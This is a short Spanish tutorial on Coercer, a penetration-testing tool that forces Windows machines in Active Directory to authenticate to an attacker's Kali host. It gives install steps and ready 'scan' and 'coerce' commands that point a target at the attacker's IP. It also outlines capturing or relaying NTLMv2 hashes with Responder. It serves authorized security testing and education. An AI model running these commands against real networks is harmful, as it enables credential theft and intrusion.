Hacking Active Directory kali linux coercer
Hacking Active Directory kali linux coercer
Coercer es una herramienta de seguridad escrita en Python que se utiliza principalmente en entornos de Active Directory (Windows). Su función principal es automatizar el proceso de forzar (o "coaccionar") a una máquina remota de Windows para que se autentique contra un servidor controlado por el atacante.
Esto es extremadamente útil para realizar ataques de SMB Relay o para obtener hashes de contraseñas (Net-NTLM) que luego pueden ser crackeados.
¿Para qué sirve Coercer?
En una red Windows, existen varios protocolos (como MS-RPRN o MS-EFSR) que permiten que un servidor le pida a otro que realice una acción. Coercer explota estas funciones legítimas para obligar a un servidor (por ejemplo, un Controlador de Dominio) a que intente conectarse a nuestra máquina de Kali Linux.
Características principales:
Multitarea: Escanea y explota múltiples métodos de coerción simultáneamente.
Fácil de usar: Una interfaz de línea de comandos intuitiva.
Compatible con Impacket: Utiliza las librerías estándar de seguridad para Windows en Linux.
Instalación en Kali Linux
La forma más sencilla de instalarlo es a través de pip (el gestor de paquetes de Python):
Actualiza tu sistema:
Bashsudo apt updateInstala la herramienta:
Bashpip install coercerNota: Si prefieres el código fuente, también puedes clonar su repositorio oficial desde GitHub.
Modos de Uso Comunes
Coercer se divide principalmente en tres comandos: scan, coerce y fuzz.
1. Escaneo (Scan)
Sirve para verificar qué métodos de coerción son vulnerables en el objetivo sin llegar a ejecutarlos.
coercer scan -u "usuario" -p "password" -d "dominio.local" -t 192.168.1.10
2. Coerción (Coerce)
Este comando intenta forzar la autenticación hacia tu IP (donde normalmente tendrías un programa como Responder o ntlmrelayx escuchando).
coercer coerce -u "usuario" -p "password" -d "dominio.local" -t 192.168.1.10 -l 192.168.1.5
-t: IP de la víctima.-l: Tu dirección IP (Kali Linux).
3. Fuzzing
Se usa para probar métodos desconocidos o variaciones en los protocolos para encontrar nuevas formas de forzar la autenticación.
Flujo de un Ataque Típico
Preparación: El atacante inicia
Responderen Kali Linux para capturar hashes.Ejecución: El atacante usa Coercer contra el Controlador de Dominio.
Respuesta: El Controlador de Dominio intenta autenticarse contra la IP del atacante.
Resultado: El atacante recibe el hash NTLMv2 o lo reenvía para ganar acceso a otra máquina.
Advertencia de seguridad: Utiliza esta herramienta únicamente en entornos controlados o bajo auditorías de seguridad autorizadas (Pentesting). El uso no autorizado en redes ajenas es ilegal.